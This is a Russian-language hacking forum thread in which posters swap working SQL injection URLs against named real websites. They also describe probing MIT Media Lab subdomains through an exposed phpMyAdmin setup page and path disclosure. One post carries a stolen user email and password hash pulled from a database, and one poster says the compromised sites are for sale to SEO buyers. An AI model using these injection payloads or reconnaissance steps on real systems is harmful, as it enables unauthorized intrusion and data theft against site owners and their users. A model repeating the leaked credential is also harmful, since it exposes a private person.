небольшой магазин
http://www.landmetzgerei.at/

http://www.landmetzgerei.at/cart.php?action=add&id=-1+union+select+1,2,3,4,5,6,7,8,9/*

а вот если user() или version() пытаюсь подставлять, то сервак ругается =( думаю можно было пробовать криптовать, но сейчас уже глаза слипаются чтоб с ним воевать если кому-то интересно можете добить

Лови:
http://www.landmetzgerei.at/cart.php?action=add&id=-1+union+select+1,2,convert(concat_ws(0x3A3a,versio n(),user(),database())+using+latin1),4,5,6,7,8,9/*
Таблицы не подбирал, это уж сам давай.
_____________________________

Цель - media.mit.edu, пр8, начал копать

таблицы не подобрал.
Хеши которые сбрутились:
остальные в очереди.

На madnet.name/tools/madss/ пробил по ReverseIp, сайтов там на серваке стопицотсотинтыщь.

Куда с этим рутом коннектицца я х.з. phpmyadmin нужный не нашёл, накопал lyme.media.mit.edu/pmadmin/ ,там авторизация, пассы канешн неподходят.
Лезу _http://lyme.media.mit.edu/pmadmin/scripts/setup.php пустило, права видать криво стоят;
lyme.media.mit.edu/pmadmin/scripts/ просматриваем файло.Версия phpMyAdmin 2.11.2, уже с**** третяя за 3 дня.

Раскрытие путей-/var/www/cerebro.old/includes/, толку 0.

Этот грёбанный поддомен в списке сайтов от целевого на серваке не присутствует, он и под другим ip.
Куда вобщем с этим рутом лезть я не знаю.Делаю вывод, что раз media.mit.edu -- affect.media.mit.edu на одном серваке, значит рут (полученные пасс\логин) целевой. Но найти зацепку к коннекту немогу.
phpMyAdmin from lyme.media.mit.edu вообще фэйк какой то.Всё ужасно криво. Если кто что накопает, обьявите плз. Уже чисто ради интереса.

если есть доступ к mysql.user.. как нащет file_priv?
сервак affect.media.mit.edu и mit.edu - разные айпишки... хотя универ один и тот же. наверника не один сервак у них и все запутано для безопасности.
mit.edu/admin - раскрытие путей.. (кое каких)
ты спрашивал про админку. думаю на этом сайте все держится.. кста как у всех универах должна быть система онлайн доступа к курсам и тд...
это большой универ и вобщем очень хороший. если б раскрутить, нас бы в новостях показали..))

http://www.rosana.de

http://www.alpinestars.se

Polemika.com.ua
вывод в txt файл..)

да скуль
_http://www.bmoca.org/artist.php?id=1+UNION+SELECT+1,user(),3,4,version( ),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25--

http://bootsus.bri-global.com/
http://www.theovalgroup.com/
http://www.davy.co.uk/

http://f1dvd.ru/index.php?p=gallerypic&img_id=-519+union+select+1,2,3,concat_ws(char(124),email,p ass),5,6,7,8,9+from+kpro6_user+limit+0,1--&galid=45&area=1&ascdesc=desc&print=1

babara@mail.ru|563f311d2613a827c2d3897a024ddf74
51654

Любителям формулы 1 ))

2 sabe
Пробей, file_priv как видишь нет, я б отписал. От админки без пассов толку нет, рута ведь туда не втулишь, я видел её. И про админку я спрашивал не на этом сайте Тот линк я к сожалению выложить не могу, слишком дорого мне выйдет.
Рут то на media.mit.edu по идее, т.к. media.mit.edu
и mit.edu на разных серваках и ипах,соответсвенно affect.media.mit.edu откуда стянули рута, это поддомен корня media.mit.edu на этом серваке, и рут по идее должен быть к нему, а не к mit.edu, сервы то разные... Но про это я писал выше, подразумевая целевой рут.
Да в принципе я и ломал не для новостей, а сеошникам\скупщикам загнать как еду пиаристую. Как видишь всё корыстно .